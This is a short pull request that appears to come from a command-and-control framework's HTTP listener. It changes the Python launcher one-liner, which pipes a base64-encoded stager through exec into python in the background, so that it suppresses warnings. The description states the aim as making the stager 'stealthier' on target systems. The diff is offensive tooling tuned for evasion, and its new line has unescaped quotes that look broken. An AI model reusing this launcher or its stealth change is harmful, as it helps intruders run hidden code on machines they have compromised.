### PR TITLE
Silencing warnings

### DIFF
--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -334,7 +334,7 @@ class Listener:
 
                 if encode:
                     launchEncoded = base64.b64encode(launcherBase)
-                    launcher = "echo \"import sys,base64;exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
+                    launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings("ignore");exec(base64.b64decode('%s'));\" | python &" % (launchEncoded)
                     return launcher
                 else:
                     return launcherBase


### PR DESCRIPTION
on certain systems when launching the python stager, a bunch of warnings are thrown, and it would be stealthier if that wasn't the case. This change just stops printing warnings.